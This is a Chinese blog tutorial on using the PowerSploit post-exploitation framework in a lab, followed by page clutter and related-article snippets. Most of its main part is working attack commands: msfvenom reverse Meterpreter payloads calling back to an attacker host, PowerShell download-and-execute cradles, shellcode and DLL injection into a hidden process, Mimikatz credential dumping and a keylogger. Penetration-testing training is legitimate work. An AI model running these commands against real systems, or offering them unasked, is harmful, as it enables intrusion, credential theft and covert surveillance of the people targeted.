PowerSploit渗透教程

最新推荐文章于 2024-04-23 22:00:47 发布
最新推荐文章于 2024-04-23 22:00:47 发布
阅读量1.8k 收藏 16
点赞数 3
分类专栏: 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43749601/article/details/115047665
版权

简介

PowerSploit是一款基于PowerShell的后渗透框架软件,包含很多Powershell攻击脚本,它们主要是用于渗透中的信息侦查、权限提升、权限维持。
https://github.com/mattifestation/PowerSploit

Linux下安装和搭建Powersploit

开启Apache服务
在这里插入图片描述
将下载好的文件放在/var/www/html目录,搭建一个简易的服务器
在这里插入图片描述
在网页中打开http://localhost/PowerSploit-master/
在这里插入图片描述

Powersploit 模块简介

  • AntivirusBypass 发现杀软查杀特征
  • CodeExecution 在目标主机执行代码
  • Exfiltration 目标主机上的信息搜集工具
  • Mayhem 蓝屏等破坏性脚本
  • Persistence 后门脚本(持久性控制)
  • Recon 以目标主机为跳板进行内网信息侦查
  • ScriptModification 在目标主机上创建或修改脚本

PowerSpolit模块运用

Invoke-Shellcode
CodeExecution模块下的Invoke-Sellcode脚本常用语将ShellCode插入指定的进程ID或本地Powershell中,此模块结合MSF使用可以达到意想不到的效果。

1. 直接执行ShellCode反弹Meterpreter Shell
首先在MSF里使用reverse_https模块进行反弹
在这里插入图片描述
使用msfvenom命令生成一个PowerShell脚本木马

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.213.136 LPORT=4444 -f powershell -o /var/www/html/test

在这里插入图片描述
接着在目标机Powershell下输入以下命令下载该脚本

iex(New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/CodeExecution/Invoke-Shellcode.ps1")

接着输入以下命令下载木马

iex(New-Object Net.WebClient).DownloadString("http://192.168.213.136/test")

接着在PowerShell下运行该命令

 Invoke-Shellcode -Shellcode ($buf) -Force

-Force意思是不用提示,直接执行。返回MSF的监听界面下,发现已经反弹成功了。

2. Invoke-Portscan扫描端口
Invoke-Portscan是Recon模块下的一个脚本,主要用于端口扫描,使用起来也很简单。
首先下载脚本

IEX (New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/Recon/Invoke-Portscan.ps1")

然后使用以下命令进行扫描

Invoke-Portscan -Hosts 192.168.213.138,192.168.213.136 -Ports "80,22,3389,4444"

在这里插入图片描述

3. Invoke-DllInjection DLL注入脚本
Invoke-DllInjection是Code Execution模块下的一个脚本,它是一个DLL注入的脚本。
首先下载脚本

IEX (New-Object Net.Webclient).DownloadString("http://192.168.213.136/PowerSploit-master/CodeExecution/Invoke-DllInjection.ps1")

然后使用以下命令在kali中生成一个DLL注入脚本(默认生成的是32位的脚本,如要生成64位脚本则加一个x64)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.213.136 lport=4444 -f dll -o /var/www/html/test.dll

在这里插入图片描述
把生成的test.dll上传到目标服务器的C盘后,就能启动一个新的进程进行DLL注入,这样可以使注入变得更加隐蔽,使用如下命令新建一个名为notepad.exe的隐藏进程。

Start-Process C:\Windows\System32\notepad.exe -WindowStyle Hidden

然后获得notepad.exe的pid。
在这里插入图片描述
然后使用以下命令进行注入

Invoke-DllInjection -ProcessID 5080 -Dll c:\test.dll

注入成功
在这里插入图片描述
返回MSF监听界面,再使用reverse_tcp模块进行反弹,发现已经成功反弹。

4. Invoke-Mimikatz 信息收集

Invoke-Mimikatz是Exfiltration模块下的脚本。用来做信息收集。
首先下载命令

IEX (New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/Exfiltration/Invoke-Mimikatz.ps1")

接着运行命令即可

 Invoke-Mimikatz -DumpCreds
 invoke-mimikatz -Command "Privilege::Debug Sekurlsa::logonpasswords"

在这里插入图片描述

5. Get-Keystrokes 键盘记录器
Get-Keystrokes是Exfiltration模块下的一个脚本,用于键盘记录,可以记录键盘输入记录,以及鼠标的点击情况,还能记录详细的时间
首先下载脚本

IEX (New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/Exfiltration/Get-Keystrokes.ps1")

然后执行以下命令开启键盘记录

 Get-Keystrokes -LogPath c:\key.txt

在这里插入图片描述

2021!
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透系列:PowerShell攻击指南(PowerSploit部分,很多执行不下去)
weixin_54626591的博客
01-04 761
PowerShell攻击指南(PowerSploit部分,很多执行不下去)
PowerSploitPowerSploit-PowerShell开发后框架
02-18
该项目不再受支持 PowerSploit是Microsoft PowerShell模块的集合,可用于在评估的所有阶段帮助渗透测试人员。 PowerSploit由以下模块和脚本组成: 代码执行 在目标计算机上执行代码。 Invoke-DllInjection 将Dll注入到您选择的进程ID中。 Invoke-ReflectivePEInjection 将Windows PE文件(DLL / EXE)反射性地加载到powershell进程中,或反射性地将DLL注入到远程进程中。 Invoke-Shellcode 将shellcode注入您选择的进程ID或在本地PowerShell中。 Invoke-WmiCommand 在目标计算机上执行PowerShell脚本块,并使用WMI作为C2通道返回其格式化输出。 脚本修改 修改和/或准备脚本以在受感染的计算机上执行。 Out-Encoded
python powershell库_利用python搭建Powersploit powershell脚本站点
weixin_31295867的博客
01-28 213
powershell脚本站点的搭建一、PowersploitPowersploit是一款基于powershell的后渗透(Post-Exploitation)框架,集成大量渗透相关模块和功能。下载powersploitgithub地址: https://github.com/mattifestation/PowerSploit二、搭建站点(这里用python自带的web服务,也可以用phpstud...
PowerSploit 脚本攻击
weixin_58457395的博客
05-08 927
准备 虚拟机 IP kali 192.168.100.3 windows 7 192.168.100.252 1. kali 跟 win 7 关闭防火墙 kali关闭防火墙控制软件 apt-get install ufw //下载ufw ufw disable //关闭防火墙 2. kali 与 win 7 必须ping通 Kali 配置 安装PowerSplo...
PowerSploit渗透测试者的强大工具箱
gitblog_00071的博客
03-19 311
PowerSploit渗透测试者的强大工具箱 项目地址:https://gitcode.com/mattifestation/PowerSploit PowerSploit 是一个广为人知的安全研究项目,主要用于 PowerShell 的渗透测试和安全审计。由安全研究人员 Matthew "mattifestation" Graeber 创建并维护,它是一系列模块化脚本,旨在...
PowerSploit
最新发布
sinat_25635183的博客
04-23 996
PowerSploit是一套用于PowerShell的开源渗透测试工具集,旨在帮助安全专业人员评估和增强Windows环境的安全性。它包含了各种模块和技术,可用于执行各种攻击和渗透测试任务,如权限提升、横向移动、信息收集等。PowerShell脚本模块:PowerSploit提供了一系列PowerShell脚本,用于执行各种渗透测试任务。这些脚本包括各种攻击技术,如Shellcode执行、凭据盗窃、权限提升等。Mimikatz模块。
powersploit介绍以及攻击实战
weixin_43152809的博客
01-02 1843
powersploit是一款基于powershell的后渗透框架软件,包含很多powershell攻击脚本,主要用于信息侦察、权限提升、权限维持 下载地址 powersploit安装 git命令下载 git clone https://github.com/PowerShellMafia/PowerSploit/ 随后打开apache服务器,将下载的文件上传到www目录下 按照上图介绍powersploit各模块的功能 AntivirusBypass 发现杀毒软件的查杀特征 CodeExecutio
PowerSploit攻击
weixin_45007073的博客
05-07 408
PowerSploit简介各模块功能Invoke-Shellcode 简介 PowerSploit是一款后渗透框架,主要用于信息侦察、权限提升、权限维持。它在github上可以下载 各模块功能 模块 功能 AntivirusBypass 发现杀毒软件的查杀特征 CodeExecution 在目标主机上执行代码 Exfiltration 目标主机上的信息搜集工具 Mayhem 蓝屏等破坏性脚本 Persistence 后门脚本 Recon 以目标主机为跳板进行内网信息侦察
PowerSploit脚本攻击实战
bring_coco的博客
01-24 959
环境 kali(192.168.188.128) win7(192.168.188.148) 前提 1.输入git命令安装PowerSploit 命令:git clone https://github.com/PowerShellMafia/PowerSploit 演示: 2.输入以下命令开启Apache服务 命令:service apache2 start 演示: 3.把下载好的文件夹移动到var/www/html目录,搭建一个简易的服务器 介绍PowerSploit各模块的功能 1.Antivi
PowerSploit 使用方法
weixin_44844556的博客
03-13 270
powersploit
POWERSHELL_内网渗透实例.pdf
08-07
目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内网渗透实例
PowerSploit, PowerSploit: PowerShell发布框架.zip
09-18
PowerSploit, PowerSploit: PowerShell发布框架 是一组可以在评估的所有阶段帮助渗透测试人员的Microsoft PowerShell模块集合。 PowerSploit由以下模块和脚本组成: CodeExecution在目标机器上执行代码。 Invoke-...
[ 内网渗透 ] 内网端口扫描.zip
02-11
[ 内网渗透 ] 内网端口扫描 包含如下工具 nishang PowerSploit RedTeamTool ScanLine unzip
PowEnum:执行常见的PowerSploit Powerview功能,然后将输出合并到电子表格中以方便分析
04-28
PowEnum 渗透测试人员通常会枚举AD数据-提供领域态势感知并帮助识别软目标。 PowEnum可帮助自动执行目标域的制图视图。 PowEnum执行常见的PowerSploit Powerview功能,并将输出合并到电子表格中,以方便分析。 所有...
SQL注入如何判断数据库类型
weixin_43749601的博客
04-01 7486
前言 在进行SQL注入之前,首先应该判断数据库的类型,不同的数据库在处理一些函数的时候会有一些微妙的差别,只有判断出是哪种数据库类型,这样才能根据数据库的类型选择合适的函数,更容易实现SQL注入。 前端与数据库类型 asp:SQL Server,Access .net:SQL Server php:MySQL,PostgreSQL java:Oracle,MySQL 根据端口判断 Oracle:默认端口1521 SQL Server:默认端口1433 MySQL:默认端口3306 根据数据库特有函数来判断
Apache Solr 任意文件读取
weixin_43749601的博客
04-11 4972
简介 Solr是Apache Lucene项目的开源企业搜索平台。其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本(如Word、PDF)的处理。Solr是高度可扩展的,并提供了分布式搜索和索引复制。Solr是最流行的企业级搜索引擎,Solr 4还增加了NoSQL支持。 Solr是用Java编写、运行在Servlet容器(如Apache Tomcat或Jetty)的一个独立的全文搜索服务器。 Solr采用了Lucene Java搜索库为核心的全文索引和搜索,并具有类似REST的HT
NACOS身份登陆绕过
weixin_43749601的博客
04-12 3372
简介 Nacos 致力于帮助用户发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助用户快速实现动态服务发现、服务配置、服务元数据及流量管理。 Nacos 支持基于 DNS 和基于 RPC 的服务发现。服务提供者使用 原生SDK、OpenAPI、或一个独立的Agent TODO注册 Service 后,服务消费者可以使用DNS TODO 或HTTP&API查找和发现服务。 影响范围 Nacos <= 2.0.0-ALPHA.1 漏洞详情 1、后台扫描 http://exampl
XML外部实体注入;XXE漏洞;XXE有回显注入;XXE无回显注入;Blind XXE;绕过方式总结
weixin_43749601的博客
03-30 2870
漏洞原理 XE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可以加载恶意外部文件,造成文件读取、命令执行、内网端口扫描。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件 环境搭建 地址:https://github.com/c0ny1/xxe-lab 下载好后将PHP_XXE放到PHPstudy的www目录下就可以访问 XXE有回显注入 在登录处先抓一下包,可以看到是参数的传递格式是XML,可能存在XML注入。 将数据包发送到R
SQL注入写入Webshell
weixin_43749601的博客
03-28 2693
前言 在平时的CTF题目中,我们只是利用SQL注入漏洞去获取flag,但是在实际的渗透环境中,我们可以利用SQL注入漏洞去上传一个webshell,进而获取网站的后台权限。 首先,对于能否写入webshell是有条件的: secure_file_priv 支持数据导出。MySQL用secure_file_priv这个配置项来完成对数据导入导出的限制。如果secure_file_priv=NULL,MySQL服务会禁止导入和导出操作。通过命令查看secure-file-priv`的当前值,确认是否允许导入导
powersploit
07-29
- *1* *2* *3* [PowerSploit渗透教程](https://blog.csdn.net/weixin_43749601/article/details/115047665)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值